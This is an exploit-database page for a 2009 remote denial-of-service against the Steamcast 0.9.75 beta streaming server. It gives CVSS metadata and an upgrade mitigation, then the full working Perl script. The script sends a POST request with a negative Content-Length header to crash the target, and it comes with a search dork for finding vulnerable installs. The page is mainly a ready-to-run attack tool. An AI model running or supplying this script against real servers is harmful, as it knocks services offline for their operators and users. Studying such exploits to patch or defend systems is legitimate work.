header-logo
Suggest Exploit
vendor:
Steamcast
by:
ksa04
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Steamcast
Affected Version From: 0.9.75 beta
Affected Version To: 0.9.75 beta
Patch Exists: YES
Related CWE: N/A
CPE: a:steamcast:steamcast:0.9.75_beta
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP and Linux
2009

Steamcast 0.9.75 beta Remote Denial of Service

This exploit sends a malicious POST request with a negative Content-Length header to the target host, causing the Steamcast 0.9.75 beta server to crash.

Mitigation:

Upgrade to the latest version of Steamcast
Source

Exploit-DB raw data:

#!/usr/bin/perl
#Steamcast 0.9.75 beta Remote Denial of Service
#Download :http://www.steamcast.com
#Tested Under Windows XP and linux
#Dork for test :"Powered By Steamcast "0.9.75 beta
#Author: ksa04
use strict;
use warnings;
use IO::Socket;

my $host = shift || die "usage: perl $0 host port\n";
my $port = shift ;

my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp')
or die "error: $!\n";

$sock->send("POST / HTTP/1.1\r\n");
$sock->send("Content-Length: -100\r\n\r\n");


$sock->close;

print "[+]Done...\n";

# milw0rm.com [2009-04-14]

Navigation

Suggest Exploit

Services By CQR